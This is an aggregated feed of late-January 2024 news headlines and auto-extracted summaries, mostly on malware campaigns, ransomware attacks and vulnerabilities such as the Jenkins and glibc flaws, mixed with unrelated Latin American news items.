            A financially motivated threat actor using USB devices for initial infection has been found abusing legitimate online platforms, including GitHub, Vimeo, and Ars Technica, to host encoded payloads embedded in seemingly benign content. [...]

            Autosummary: QUIETBOARD is a sophisticated, multi-component backdoor used by UNC4990, offering a wide range of capabilities, including: executing commands or scripts received from the C2 server; executing Python code received from the C2; altering clipboard content for cryptocurrency theft; infecting USB/removable drives to spread malware to other systems; capturing screenshots for information theft; gathering detailed system and network information; determining the geographical location of the infected system. QUIETBOARD also establishes persistence across system reboots and supports dynamically adding new functionalities through extra modules.


            Europcar denies data breach of 50 million users, says data is fake

            financial
            2024-01-31 https://www.bleepingcomputer.com/news/security/europcar-denies-data-breach-of-50-million-users-says-data-is-fake/
            Car rental company Europcar says it has not suffered a data breach and that shared customer data is fake after a threat actor claimed to be selling the personal info of 50 million customers. [...] "

            Autosummary: "After being notified by a threat intel service that an account pretends to sell Europcar data on the dark net and thoroughly checking the data contained in the sample, we are confident that this advertisement is false:
            - the number of records is completely wrong & inconsistent with ours,
            - the sample data is likely ChatGPT-generated (addresses don't exist, ZIP codes don't match, first name and last name don't match email addresses, email addresses use very unusual TLDs),
            - and most importantly: none of these email addresses are present in our database. "


            Nitrogen shelling malware from hacked sites

            exploits
            2024-01-31 https://www.malwarebytes.com/blog/threat-intelligence/2024/01/nitrogen-shelling-malware-from-hacked-sites
            Threat actors are using all the tools at their disposal to deliver malware. Malicious ads are only one step in the chain, with compromised sites providing the free hosting and changing capabilities that can evade detection. "

            Autosummary: [Figure: Python running a malicious file] The Python file it executes is heavily obfuscated. [Figure: Obfuscated Python file] ThreatDown will detect this malicious activity and quarantine the malicious Python file. [Figure: ThreatDown detecting and blocking the malicious Python file] Blocking the payload at this step is crucial as it is the point where it will otherwise contact its command and control server (C2). [Figure: Network traffic between victim and C2] In recent Zip installers for Nitrogen, we noticed two files likely related to their control panel. [Figure residue: 403WebShell, Nega1ve Shell, WSOX Shell] Payload: Nitrogen uses DLL side-loading via a signed executable to launch its payload. [Figure: Side-loading a malicious DLL] It then proceeds with running Python from a newly created folder under %appdata%: "


            CISA adds Apple improper authentication bug to its Known Exploited Vulnerabilities catalog

            exploits
            2024-01-31 https://securityaffairs.com/158412/security/cisa-apple-bug-to-known-exploited-vulnerabilities-catalog.html
            U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple improper authentication bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Apple improper authentication bug, tracked as CVE-2022-48618, to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability can allow an attacker with arbitrary read and write capability to bypass Pointer […] "

            Autosummary: "


            Brazil's Lula sacks deputy intelligence chief

            latam
            2024-01-31 https://www.bbc.co.uk/news/world-latin-america-68150527
            Investigations continue into alleged illegal spying when his predecessor Jair Bolsonaro was in power. "

            Autosummary: "


            MotoGP's Argentina Grand Prix cancelled

            latam
            2024-01-31 https://www.bbc.co.uk/sport/motorsport/68158096
            MotoGP's Argentina Grand Prix is cancelled due to the "current circumstances" in the country. "

            Autosummary: "


            "We're the country of beef, but we only eat chicken"

            government
            2024-01-30 https://www.bbc.co.uk/news/business-68126858?at_medium=RSS&at_campaign=KARANGA
            Argentina is divided over the new president's plans for its troubled economy. "

            Autosummary: "


            Ransomware recap 2023 highlights cybersecurity crisis

            exploits ciber
            2024-01-30 https://www.helpnetsecurity.com/2024/01/30/2023-ransomware-environment-video/

            In this Help Net Security video, Yochai Corem, CEO of Cyberint, explores the ransomware environment’s development, effects, and emerging patterns throughout the previous year. 2023 marked a historic high for ransomware groups, with a 55.5% increase in attacks, reaching 4,368 victims globally, according to Cyberint. Key findings from their report include: The MOVEit campaign was the most successful campaign of 2023, emphasizing the impact of supply chain attacks. LockBit 3.0 led as the most active … More

            The post Ransomware recap 2023 highlights cybersecurity crisis appeared first on Help Net Security.

            "

            Autosummary: "


            HaystackID enhances Protect Analytics AI Suite to strengthen data analysis

            industry
            2024-01-30 https://www.helpnetsecurity.com/2024/01/30/haystackid-protect-analytics-ai-suite/

            HaystackID announced the expansion of its Protect Analytics AI Suite of AI enabled services designed to enhance the efficiency and effectiveness of identifying, analyzing, and reporting on sensitive information within large, unstructured datasets. The enhanced suite featuring Protect Analytics AI – Sensitive Data Identification, Protect Analytics AI – Entity Extraction, and Protect Analytics AI – Deploy continues to transform cybersecurity-centric incident responses, breach investigations, and notification actions by decreasing time to precision insight and action … More

            The post HaystackID enhances Protect Analytics AI Suite to strengthen data analysis appeared first on Help Net Security.

            "

            Autosummary: Key cross-functional features of the Protect Analytics AI Suite, enabled through a combination of custom development and multimodal integration of best-of-breed AI and large language model (LLM) tools, include: Interactive visualizations : Through integration with tools like Microsoft Power BI, the suite provides interactive data visualizations, enabling users to sort, query, and analyze sensitive data swiftly and effectively. "


            Qualys expands partnership with Orange Cyberdefense to optimize vulnerability management activities

            exploits
            2024-01-30 https://www.helpnetsecurity.com/2024/01/30/qualys-orange-cyberdefense-partnership/

            Qualys announced that it is expanding its partnership with Orange Cyberdefense. This expansion signifies that Qualys’ capabilities such as Vulnerability Management, Detection and Response (VMDR) will be included in Orange Cyberdefense’s managed Vulnerability Intelligence Service. The expanded collaboration will give global businesses the ability to leverage Orange Cyberdefense’s managed service to optimize vulnerability management activities and reduce cyber risk thus enabling customers to focus on their core business. “Expanding our partnership with Qualys felt natural,” … More

            The post Qualys expands partnership with Orange Cyberdefense to optimize vulnerability management activities appeared first on Help Net Security.

            "

            Autosummary: "


            New ZLoader Malware Variant Surfaces with 64-bit Windows Compatibility

            exploits
            2024-01-30 https://thehackernews.com/2024/01/new-zloader-malware-variant-surfaces.html
            Threat hunters have identified a new campaign that delivers the ZLoader malware, resurfacing nearly two years after the botnet's infrastructure was dismantled in April 2022. A new variant of the malware is said to have been in development since September 2023, Zscaler ThreatLabz said in an analysis published this month. "The new version of Zloader made significant changes to the loader "

            Autosummary: "


            Cactus ransomware gang claims the Schneider Electric hack

            exploits ransomware
            2024-01-30 https://securityaffairs.com/158320/data-breach/schneider-electric-cactus-ransomware-attack.html
            Energy management and industrial automation firm Schneider Electric suffered a data breach after a Cactus ransomware attack. Schneider Electric is a multinational company that specializes in energy management, industrial automation, and digital transformation. BleepingComputer first reported the attack that hit the Sustainability Business division of the company on January 17th. BleepingComputer contacted Schneider Electric which […] "

            Autosummary: The company is working to restore the impacted systems and is investigating the incident with the help of leading cybersecurity firms. The Cactus ransomware operation has been active since March 2023; although the threat actors use a double-extortion model, their data leak site has yet to be discovered. "


            Joinville: Acid spill covers Brazil river in thick white foam

            latam
            2024-01-30 https://www.bbc.co.uk/news/world-latin-america-68138208?at_medium=RSS&at_campaign=KARANGA
            A state of emergency is declared after a truck crash releases sulfonic acid into the Rio Seco. "

            Autosummary: "


            Microsoft Teams phishing pushes DarkGate malware via group chats

            financial exploits
            2024-01-30 https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-pushes-darkgate-malware-via-group-chats/
            New phishing attacks abuse Microsoft Teams group chat requests to push malicious attachments that install DarkGate malware payloads on victims' systems. [...] "

            Autosummary: DarkGate's developer said it includes many capabilities, such as a concealed VNC, tools to bypass Windows Defender, a browser history theft tool, an integrated reverse proxy, a file manager, and a Discord token stealer. "


            How SMBs can lower their risk of cyberattacks and data breaches

            financial ciber
            2024-01-30 https://www.bleepingcomputer.com/news/security/how-smbs-can-lower-their-risk-of-cyberattacks-and-data-breaches/
            SMBs are attractive targets for cybercriminals as they typically have fewer resources like IT support, and lack robust security procedures, like employee cybersecurity training. Learn more from Specops Software on how SMBs can protect themselves from cyberattacks. [...] "

            Autosummary: According to the framework, SMBs can mitigate risks by: controlling who can access your network and data; having formal policies for use; encrypting sensitive data, both at rest and in transit; using network firewalls with integrated security; monitoring for unauthorized access; backing up data regularly; and creating plans for responding to and recovering from attacks. These best practices can help reduce unauthorized access. In 2023, we've seen multiple breaches of SMBs that turned into large-scale attacks on major companies, including AT&T, Chick-fil-A, and 1Password. End-user awareness training: 88% of data breaches can be traced back to human error, according to a joint study between a Stanford University researcher and Tessian. "


            Citibank sued over failure to defend customers against hacks, fraud

            financial
            2024-01-30 https://www.bleepingcomputer.com/news/technology/citibank-sued-over-failure-to-defend-customers-against-hacks-fraud/
            New York Attorney General Letitia James sued Citibank over its alleged failure to defend customers against hacks and scams and refusal to reimburse victims after allowing fraudsters to steal millions from their accounts. [...] "

            Autosummary: Two years ago, James also led a coalition of attorneys general from multiple U.S. states urging major banks—including JPMorgan Chase, Bank of America, U.S. Bank, and Wells Fargo—to eliminate overdraft fees on consumer accounts. "


            Police disrupt Grandoreiro banking malware operation, make arrests

            financial exploits
            2024-01-30 https://www.bleepingcomputer.com/news/security/police-disrupt-grandoreiro-banking-malware-operation-make-arrests/
            The Federal Police of Brazil and cybersecurity researchers have disrupted the Grandoreiro banking malware operation, which has been targeting Spanish-speaking countries with financial fraud since 2017. [...] "

            Autosummary: Most of the victims are in Spain, Mexico, and Brazil, while the most impacted operating system is Windows 10, followed by 7, 8, and 11. "


            Brazilian Feds Dismantle Grandoreiro Banking Trojan, Arresting Top Operatives

            financial exploits latam
            2024-01-30 https://thehackernews.com/2024/01/brazilian-feds-dismantle-grandoreiro.html
            A Brazilian law enforcement operation has led to the arrest of several Brazilian operators in charge of the Grandoreiro malware. The Federal Police of Brazil said it served five temporary arrest warrants and 13 search and seizure warrants in the states of São Paulo, Santa Catarina, Pará, Goiás, and Mato Grosso. Slovak cybersecurity firm ESET, which provided additional "

            Autosummary: Grandoreiro is one of the many Latin American banking trojans such as Javali, Melcoz, Casabeniero, Mekotio, and Vadokrist, primarily targeting countries like Spain, Mexico, Brazil, and Argentina. "


            US threatens to reimpose sanctions on Venezuelan oil sector

            industry
            2024-01-30 https://www.bbc.co.uk/news/world-latin-america-68139518?at_medium=RSS&at_campaign=KARANGA
            The move comes after Venezuela's Supreme Court upheld a ban on the main opposition candidate. "

            Autosummary: "


            New Linux glibc flaw lets attackers get root on major distros

            Linux
            2024-01-30 https://www.bleepingcomputer.com/news/security/new-linux-glibc-flaw-lets-attackers-get-root-on-major-distros/
            Unprivileged attackers can get root access on multiple major Linux distributions in default configurations by exploiting a newly disclosed local privilege escalation (LPE) vulnerability in the GNU C Library (glibc). [...] "

            Autosummary: "


            Online ransomware decryptor helps recover partially encrypted files

            exploits ransomware
            2024-01-30 https://www.bleepingcomputer.com/news/security/online-ransomware-decryptor-helps-recover-partially-encrypted-files/
            CyberArk has created an online version of "White Phoenix," an open-source ransomware decryptor targeting operations using intermittent encryption. [...] "

            Autosummary: Current ransomware strains employing intermittent encryption include Blackcat/ALPHV, Play, Qilin/Agenda, BianLian, and DarkBit. "


            Root access vulnerability in GNU Library C (glibc) impacts many Linux distros

            exploits Linux
            2024-01-30 https://securityaffairs.com/158369/breaking-news/gnu-library-c-glibc-cve-2023-6246-flaw.html
            Qualys researchers discovered a root access flaw, tracked as CVE-2023-6246, in GNU Library C (glibc) affecting multiple Linux distributions. The Qualys Threat Research Unit discovered four security vulnerabilities in the GNU Library C (glibc), including a heap-based buffer overflow tracked as CVE-2023-6246. GNU C Library (glibc) is a free software library that provides essential system […] "

            Autosummary: Pierluigi Paganini, January 30, 2024. Qualys researchers discovered a root access flaw, tracked as CVE-2023-6246, in GNU Library C (glibc) affecting multiple Linux distributions. "


            ESET takes part in global operation to disrupt the Grandoreiro banking trojan

            financial exploits
            2024-01-30 https://www.welivesecurity.com/en/eset-research/eset-takes-part-global-operation-disrupt-grandoreiro-banking-trojan/
            ESET provided technical analysis, statistical information, known C&C servers and was able to get a glimpse of the victimology "

            Autosummary: Grandoreiro DGA clusters

            Cluster ID | dga_id list | Cluster size | % of all C&C servers | % of all victims
            1 | b, bbh, bbj, bbn, bhg, cfb, cm, cob, cwe, dee, dnv, dvg, dzr, E, eeo, eri, ess, fhg, fox, gh, gh(2), hjo, ika, jam, jjk, jjk(2), JKM, jpy, k, kcy, kWn, md7, md9, MRx, mtb, n, Nkk, nsw, nuu, occ, p, PCV, pif, rfg, rox3, s, sdd, sdg, sop, tkk, twr, tyj, u, ur4, vfg, vgy, vki, wtt, ykl, Z, zaf, zhf | 62 | 93.6% | 94%
            2 | jl2, jly | 2 | 2.4% | 2.5%
            3 | ibr | 1 | 0.8% | 1.6%
            4 | JYY | 1 | 1.6% | 1.1%

            The biggest cluster contains 78% of all active dga_ids.

            Grandoreiro long-term tracking
            ESET systems designed for automated, long-term tracking of selected malware families have been monitoring Grandoreiro since the end of 2017, extracting version information, C&C servers, targets and, since the end of 2020, DGA configurations. The malware allows: blocking the screen of the victim, logging keystrokes, simulating mouse and keyboard activity, sharing the victim’s screen, and displaying fake pop-up windows. Interestingly, we have seen a few (fewer than 10) victims marked as PM (Saint Pierre and Miquelon), GR (Greece), or FR (France). However, this number certainly contains duplicates, because if a victim stays connected for a long time, which we’ve observed is often the case, then the Grandoreiro C&C server will report it on multiple requests.

            Statistical information about Grandoreiro C&C IP addresses since we started our tracking

            Information | Average | Minimum | Maximum
            Number of new C&C IP addresses per day | 3 | 1 | 34
            Number of active C&C IP addresses per day | 13 | 1 | 27
            Lifespan of C&C IP address (in days) | 5 | 1 | 425

            Very soon after we began to track the generated domains and their associated IP addresses, we started to notice that many domains generated by DGAs with different configurations resolve to the same IP address (as illustrated in Figure 3). Trying to address this issue, we defined a unique victim as one with a unique set of identifying characteristics (like computer name, username, etc.). We saw it, in small campaigns, in March, May, and June 2022. Table 2 shows both of them, “jjk” and “gh”, where “jjk” and “jjk(2)” correspond to two different DGA configurations, same as “gh” and “gh(2)”. Based on the vast majority of its C&C server domains not resolving, its core features changing quite often, and its network protocol not functioning properly, we strongly believe it is a work in progress; hence we will focus on the main variant in this blogpost. In the month-long gap between May 24th, 2022 and June 22nd, 2022 we continued to see new samples with progressing PE compilation times, but they lacked the version identifier.

            Operating system distribution
            Since all of the login_string formats contain OS information, we can paint an accurate picture of what operating systems fell victim, as illustrated in Figure 4. That said, the data is biased by the number of requests, their intervals, and the validity of the data provided by the C&C servers. To connect to Gateway, three parameters are required: a secret key, the key length, and a login.

            Grandoreiro internals
            Let us focus, in depth, on the two most crucial features of Grandoreiro: the DGA and the network protocol. "


            US threatens to reimpose oil sanctions on Venezuela

            industry
            2024-01-30 https://www.bbc.co.uk/news/world-latin-america-68139518
            The move comes after Venezuela's Supreme Court upheld a ban on the main opposition candidate. "

            Autosummary: "


            State of emergency after Brazil river turns to foam

            latam government
            2024-01-30 https://www.bbc.co.uk/news/world-latin-america-68138208
            A state of emergency is declared after a truck crash releases sulfonic acid into the Rio Seco. "

            Autosummary: "


            "We're the country of beef, but we can only afford chicken"

            government
            2024-01-30 https://www.bbc.co.uk/news/business-68126858
            Argentina is divided over the new president's plans for its troubled economy. "

            Autosummary: "


            India's ancient carpet weaving industry meets AI

            industry
            2024-01-30 https://www.bbc.co.uk/news/business-67650613
            Kashmir's handmade carpet industry is trying to maintain its traditions while staying competitive. "

            Autosummary: "


            Top 3 Cybersecurity Trends for SME Business Leaders

            ciber
            2024-01-29 https://grahamcluley.com/feed-sponsor-cynet/
            Graham Cluley Security News is sponsored this week by the folks at Cynet. Thanks to the team there for their support. As Cynet’s COO, my team and I get to work closely with risk management executives at small-to-medium enterprises (SMEs) around the world. In this piece, I’ll distill insights from our collaboration into three salient … Continue reading "Top 3 Cybersecurity Trends for SME Business Leaders" "

            Autosummary: As a result, executives across industries must recognize security as an organizational enabler, not a narrow niche for technical specialists, and build it into the fabric of their operations. In 2024, business leaders can expect a significant increase in activity from a third flavor of adversary: ideologically motivated threat actors, often referred to as “hacktivists” or “cyberterrorists” depending on one’s opinion of their targets. For companies with 1,000-5,000 employees, the average cost of a data breach reached $4.87 million in 2023 – a year-over-year increase of nearly 20%, according to IBM. Once they have established a foothold, they may employ keyloggers to capture your every keystroke, steal browser cookies to access your online accounts, or even target specific applications like email clients and instant messaging platforms. For guidance to boost employee awareness, pg. 5 of the 2024 SME security plan checklist identifies the key components of a holistic security training program. "


            Prioritizing cybercrime intelligence for effective decision-making in cybersecurity

            ciber
            2024-01-29 https://www.helpnetsecurity.com/2024/01/29/alon-gal-hudson-rock-cybercrime-intelligence/

            In this Help Net Security interview, Alon Gal, CTO at Hudson Rock, discusses integrating cybercrime intelligence into existing security infrastructures. Our discussion will cover a range of essential aspects, from the importance of continuous adaptation in cybersecurity strategies to practical advice for CISOs on enhancing threat detection and response capabilities. We’ll also explore the challenges of balancing intelligence gathering with privacy and legal considerations and look at strategies for prioritizing intelligence inputs in decision-making. What … More

            The post Prioritizing cybercrime intelligence for effective decision-making in cybersecurity appeared first on Help Net Security.

            "

            Autosummary: To have a balance between gathering cybercrime intelligence and respecting privacy and adhering to legal considerations, organizations need to follow strict legal compliance, including data protection laws. This poses a significant risk to organizations, and it is crucial to monitor whether the organization has infected the computers of employees, customers, and partners. "


            Cybercriminals embrace smarter strategies, less effort

            ciber
            2024-01-29 https://www.helpnetsecurity.com/2024/01/29/supply-chain-disruption/

            2024 is shaping up to be a record-breaking year for data breaches, according to Experian. Despite 2023 being labeled as a ‘successful’ year for malicious actors, the upcoming months may bring forth developments that could further disrupt the cybersecurity landscape. Supply chain vulnerabilities amplified There’s no question third-party data breaches have made headlines. With increased data collection, storage, and movement, there are plenty of partners down the supply chain that could be targeted. We predict … More

            The post Cybercriminals embrace smarter strategies, less effort appeared first on Help Net Security.

            "

            Autosummary: “Cybercriminals are continually working smarter, not harder,” said Michael Bruemmer, VP, Global Data Breach Resolution at Experian. "


            Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines

            exploits
            2024-01-29 https://thehackernews.com/2024/01/malicious-pypi-packages-slip-whitesnake.html
            Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information stealing malware called WhiteSnake Stealer on Windows systems. The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS." "These "

            Autosummary: It's also designed to capture data from web browsers, cryptocurrency wallets, and apps like WinSCP, CoreFTP, Windscribe, Filezilla, AzireVPN, Snowflake, Steam, Discord, Signal, and Telegram. "


            Protests as bullfighting returns to Mexico City

            latam government
            2024-01-29 https://www.bbc.co.uk/news/world-latin-america-68125340?at_medium=RSS&at_campaign=KARANGA
            The capital city held its first bullfight since 2022 on Sunday, with hundreds turning out to protest. "

            Autosummary: "


            Critical Jenkins RCE flaw exploited in the wild. Patch now! (CVE-2024-23897)

            exploits
            2024-01-29 https://www.helpnetsecurity.com/2024/01/29/cve-2024-23897/

            Several proof-of-concept (PoC) exploits for a recently patched critical vulnerability (CVE-2024-23897) in Jenkins have been made public and there’s evidence of exploitation in the wild. About CVE-2024-23897 Jenkins is a widely used Java-based open-source automation server that helps developers build, test and deploy applications, enabling continuous integration (CI) and continuous delivery (CD). CVE-2024-23897 is an arbitrary file read vulnerability in Jenkins’ built-in command line interface (CLI) that could allow an unauthenticated threat actor with Overall/Read … More

            The post Critical Jenkins RCE flaw exploited in the wild. Patch now! (CVE-2024-23897) appeared first on Help Net Security.

            "

            Autosummary: "


            Researchers Uncover How Outlook Vulnerability Could Leak Your NTLM Passwords

            exploits
            2024-01-29 https://thehackernews.com/2024/01/researchers-uncover-outlook.html
            A now-patched security flaw in Microsoft Outlook could be exploited by threat actors to access NT LAN Manager (NTLM) v2 hashed passwords when opening a specially crafted file. The issue, tracked as CVE-2023-35636 (CVSS score: 6.5), was addressed by the tech giant as part of its Patch Tuesday updates for December 2023. "In an email attack scenario, an attacker could exploit the "

            Autosummary: "


            Albabat, Kasseika, Kuiper: New Ransomware Gangs Rise with Rust and Golang

            exploits ransomware
            2024-01-29 https://thehackernews.com/2024/01/albabat-kasseika-kuiper-new-ransomware.html
            Cybersecurity researchers have detected in the wild yet another variant of the Phobos ransomware family known as Faust. Fortinet FortiGuard Labs, which detailed the latest iteration of the ransomware, said it's being propagated by means of an infection that delivers a Microsoft Excel document (.XLAM) containing a VBA script. "The attackers utilized the Gitea service to store several files "

            Autosummary: The development comes as new ransomware families such as Albabat (aka White Bat), Kasseika, Kuiper, Mimus, and NONAME have gained traction, with the former a Rust-based malware that's distributed in the form of fraudulent software such as a fake Windows 10 digital activation tool and a cheat program for the Counter-Strike 2 game. "


            Los Alerces: Wildfire rages through national park in Argentina

            latam
            2024-01-29 https://www.bbc.co.uk/news/world-latin-america-68128137?at_medium=RSS&at_campaign=KARANGA
            An official said arson was to blame for the blaze at the park which is a Unesco World Heritage site. "

            Autosummary: "


            FBI: Tech support scams now use couriers to collect victims" money

            financial
            2024-01-29 https://www.bleepingcomputer.com/news/security/fbi-tech-support-scams-now-use-couriers-to-collect-victims-money/
            Today, the FBI warned about courier services being used to collect money and valuables from victims of tech support and government impersonation scams. [...] "

            Autosummary: "The FBI is warning the public about scammers instructing victims, many of whom are senior citizens, to liquidate their assets into cash and/or buy gold, silver, or other precious metals to protect their funds," the FBI said. "


            Ransomware payments drop to record low as victims refuse to pay

            exploits
            2024-01-29 https://www.bleepingcomputer.com/news/security/ransomware-payments-drop-to-record-low-as-victims-refuse-to-pay/
            The number of ransomware victims paying ransom demands has dropped to a record low of 29% in the final quarter of 2023, according to ransomware negotiation firm Coveware. [...] "

            Autosummary: [Figure: Ransom payment rates. Source: Coveware] According to Coveware, the reason for this continual drop is multifaceted, including better preparedness by organizations, a lack of trust towards cybercriminals promising not to publish stolen data, and legal pressure in some regions where paying a ransom is illegal. "


            Trickbot malware developer jailed for five years

            exploits
            2024-01-29 https://www.bitdefender.com/blog/hotforsecurity/trickbot-malware-developer-jailed-for-five-years/
            A 40-year-old Russian man has been sentenced to five years and four months in prison by a US court, for his involvement in the Trickbot gang that deployed ransomware and stole money and sensitive information from businesses around the world. Read more in my article on the Hot for Security blog. "

            Autosummary: Vladimir Dunaev, from Amur Oblast in the far east of Russia, was a key member of the Trickbot cybercrime gang, infamous for its sophisticated data-stealing Trojan that defrauded innocent internet users in the United States, UK, Australia, Canada, Germany, India, Italy, and elsewhere. "


            Carlos Bolsonaro: Brazil ex-leader"s son caught up in spying probe

            latam
            2024-01-29 https://www.bbc.co.uk/news/world-latin-america-68128142?at_medium=RSS&at_campaign=KARANGA
            Police have raided a number of properties linked to Brazilian politician Carlos Bolsonaro. "

            Autosummary: "


            45k Jenkins servers exposed to RCE attacks using public exploits

            exploits
            2024-01-29 https://www.bleepingcomputer.com/news/security/45k-jenkins-servers-exposed-to-rce-attacks-using-public-exploits/
            Researchers found roughly 45,000 Jenkins instances exposed online that are vulnerable to CVE-2024-23897, a critical remote code execution (RCE) flaw for which multiple public proof-of-concept (PoC) exploits are in circulation. [...] "

            Autosummary: Most of the vulnerable internet-exposed instances are in China (12,000) and the United States (11,830), followed by Germany (3,060), India (2,681), France (1,431), and the UK (1,029). "


            Energy giant Schneider Electric hit by Cactus ransomware attack

            exploits ransomware industry
            2024-01-29 https://www.bleepingcomputer.com/news/security/energy-giant-schneider-electric-hit-by-cactus-ransomware-attack/
            Energy management and automation giant Schneider Electric suffered a Cactus ransomware attack leading to the theft of corporate data, according to people familiar with the matter. [...]

            Autosummary: Outage message on Schneider Electric's Resource Advisor platform (Source: BleepingComputer). Customers of Schneider Electric's Sustainability Business division include Allegiant Travel Company, Clorox, DHL, DuPont, Hilton, Lexmark, PepsiCo, and Walmart. Like all ransomware operations, the threat actors breach corporate networks through purchased credentials, partnerships with malware distributors, phishing attacks, or by exploiting vulnerabilities.


            Be the Royal Family’s Cybersecurity Manager, and get a cut-price honey dipper!

            ciber
            2024-01-29 https://grahamcluley.com/be-the-royal-familys-cybersecurity-manager-and-get-a-cut-price-honey-dipper/
            Fancy a high-profile cybersecurity job? Here's one for you. Role: Cyber Security Manager. Location: Buckingham Palace.

            Autosummary: Evaluating, reviewing, and advising on best practice, drawing on external expertise, including the National Cyber Security Centre (NCSC).


            Keenan warns 1.5 million people of data breach after summer cyberattack

            financial ciber
            2024-01-29 https://www.bleepingcomputer.com/news/security/keenan-warns-15-million-people-of-data-breach-after-summer-cyberattack/
            Keenan & Associates is sending notices of a data breach to 1.5 million customers, warning that hackers accessed their personal information in a recent cyberattack. [...]


            Brazil spying probe targets Jair Bolsonaro's son

            latam
            2024-01-29 https://www.bbc.co.uk/news/world-latin-america-68128142
            Police have raided a number of properties linked to Brazilian politician Carlos Bolsonaro.


            Aeromexico passenger opens plane door and walks on wing

            latam
            2024-01-28 https://www.bbc.co.uk/news/world-latin-america-68121361?at_medium=RSS&at_campaign=KARANGA
            Passengers say they had been kept on the tarmac for four hours without air conditioning or water.


            Exploits released for critical Jenkins RCE flaw, patch now

            exploits
            2024-01-28 https://www.bleepingcomputer.com/news/security/exploits-released-for-critical-jenkins-rce-flaw-patch-now/
            Multiple proof-of-concept (PoC) exploits for a critical Jenkins vulnerability allowing unauthenticated attackers to read arbitrary files have been made publicly available, with some researchers reporting attackers actively exploiting the flaws in attacks. [...]

            Autosummary: On January 24, 2024, Jenkins released fixes for the two flaws with versions 2.442 and LTS 2.426.3, and published an advisory that shares various attack scenarios and exploitation pathways, as well as fix descriptions and possible workarounds for those unable to apply the security updates.


            Medusa ransomware attack hit Kansas City Area Transportation Authority

            exploits government ransomware
            2024-01-28 https://securityaffairs.com/158233/cyber-crime/kansas-city-area-transportation-authority-ransomware-attack.html
            Medusa ransomware gang claimed responsibility for the attack against the Kansas City Area Transportation Authority (KCATA). On January 23, 2024, the Kansas City Area Transportation Authority (KCATA) suffered a ransomware attack. KCATA is a public transit agency in metropolitan Kansas City. It operates the Metro Area Express (MAX) bus […]

            Autosummary: By Pierluigi Paganini, January 28, 2024. The Medusa ransomware gang claimed responsibility for the attack against the Kansas City Area Transportation Authority (KCATA).


            Multiple PoC exploits released for Jenkins flaw CVE-2024-23897

            exploits
            2024-01-28 https://securityaffairs.com/158251/hacking/cve-2024-23897-poc-exploits.html
            Multiple proof-of-concept (PoC) exploits for the recently disclosed critical Jenkins vulnerability CVE-2024-23897 have been released. Researchers warn that several PoC exploits targeting the flaw have been made public. Jenkins is the most popular open source automation server; it is maintained by CloudBees and the Jenkins community. The automation server supports developers […]

            Autosummary: By Pierluigi Paganini, January 28, 2024. Multiple proof-of-concept (PoC) exploits for the recently disclosed critical Jenkins vulnerability CVE-2024-23897 have been released.


            John Ryder stopped in ninth round by Mexico's Jaime Munguia

            latam
            2024-01-28 https://www.bbc.co.uk/sport/boxing/68121189?at_medium=RSS&at_campaign=KARANGA
            England's John Ryder is knocked down four times before being stopped in the ninth round by Jaime Munguia on Saturday night.


            AllaKore RAT Malware Targeting Mexican Firms with Financial Fraud Tricks

            financial exploits
            2024-01-27 https://thehackernews.com/2024/01/allakore-rat-malware-targeting-mexican.html
            Mexican financial institutions are the target of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT. The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin America-based, financially motivated threat actor. The campaign has been active since at least 2021. "Lures use Mexican Social

            Autosummary: "AllaKore RAT, although somewhat basic, has the potent capability to keylog, screen capture, upload/download files, and even take remote control of the victim's machine," BlackBerry said.


            Participants earned more than $1.3M at the Pwn2Own Automotive competition

            industry
            2024-01-27 https://securityaffairs.com/158202/hacking/pwn2own-automotive-day-three.html
            Bug bounty hunters earned more than $1.3 million for hacking Teslas, infotainment systems, and electric vehicle chargers at the Pwn2Own Automotive competition. The Zero Day Initiative’s Pwn2Own Automotive competition has ended; participants demonstrated 49 zero-day vulnerabilities affecting automotive products, earning a total of $1,323,750. The Synacktiv team won the competition and earned a total […]

            Autosummary: By Pierluigi Paganini, January 27, 2024. Bug bounty hunters earned more than $1.3 million for hacking Teslas, infotainment systems, and electric vehicle chargers at the Pwn2Own Automotive competition.


            The Week in Ransomware - January 26th 2024 - Govts strike back

            exploits ransomware
            2024-01-27 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-26th-2024-govts-strike-back/
            Governments struck back this week against members of ransomware operations, imposing sanctions on one threat actor and sentencing another to prison. [...]

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @LawrenceAbrams, @serghei, @BleepinComputer, @Seifreed, @Ionut_Ilascu, @demonslay335, @fwosar, @malwrhunterteam, @NCSC, @TrendMicro, @Intrinsec, @Fortinet, @pcrisk, and @rivitna2. Unfortunately, we also learned about numerous large-scale attacks this week, including an Akira attack on Tietoevry, an attack on water services giant Veolia North America, and an attack on fintech firm EquiLend, which LockBit claimed.


            Kansas public transportation authority hit by ransomware

            exploits ransomware
            2024-01-27 https://www.bleepingcomputer.com/news/security/kansas-public-transportation-authority-hit-by-ransomware/
            The Kansas City Area Transportation Authority (KCATA) announced it was targeted by a ransomware attack on Tuesday, January 23. [...]

            Autosummary: "All service is operating, including fixed-route buses, Freedom and Freedom-On-Demand paratransit service," explained KCATA.


            Pro-Ukraine hackers wiped 2 petabytes of data from Russian research center

            rusia-ucrania
            2024-01-27 https://securityaffairs.com/158214/hacktivism/ukraines-ministry-of-defense-hit-russian-recent-center.html
            The Main Intelligence Directorate of Ukraine’s Ministry of Defense states that pro-Ukraine hackers wiped 2 petabytes of data from a Russian research center. The Main Directorate of Intelligence of the Ministry of Defense of Ukraine revealed that the pro-Ukraine hacker group “BO Team” wiped the database of the Far Eastern Scientific Research Center of Space Hydrometeorology […]

            Autosummary: By Pierluigi Paganini, January 27, 2024. The Main Intelligence Directorate of Ukraine’s Ministry of Defense states that pro-Ukraine hackers wiped 2 petabytes of data from a Russian research center.


            Kansas City public transportation authority hit by ransomware

            exploits government ransomware
            2024-01-27 https://www.bleepingcomputer.com/news/security/kansas-city-public-transportation-authority-hit-by-ransomware/
